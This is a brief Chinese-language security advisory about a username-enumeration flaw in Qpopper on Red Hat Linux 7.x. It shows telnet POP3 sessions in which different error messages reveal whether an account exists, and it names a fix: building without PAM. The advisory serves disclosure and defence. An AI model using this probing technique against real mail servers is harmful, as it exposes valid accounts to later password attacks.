Qpopper 验证方式漏洞
/ns/ld/unix/data/20010909024840.htm
涉及程序:
Qpopper
描述:
利用 Qpopper 验证方式漏洞取得用户信息
详细:
发现 Redhat Linux 7.x Qpopper 软件包验证方式上存在漏洞,攻击者利用此漏洞能取得受影响服务器的用户信息
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22975.998689264@target.host>
user validuser
+OK Password required for validuser.
pass valid
-ERR [AUTH] PAM authentication failed for user "validuser": Authentication
failure (7)
+OK Pop server at target.host signing off.
Connection closed by foreign host.
Non-existent account:
[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22984.998689464@target.host>
user fakeuser
+OK Password required for fakeuser.
pass fakeeeee
-ERR [AUTH] Password supplied for "fakeuser" is incorrect.
+OK Pop server at target.host signing off.
Connection closed by foreign host.
解决方案:
编译 qpopper 时不使用 PAM 支持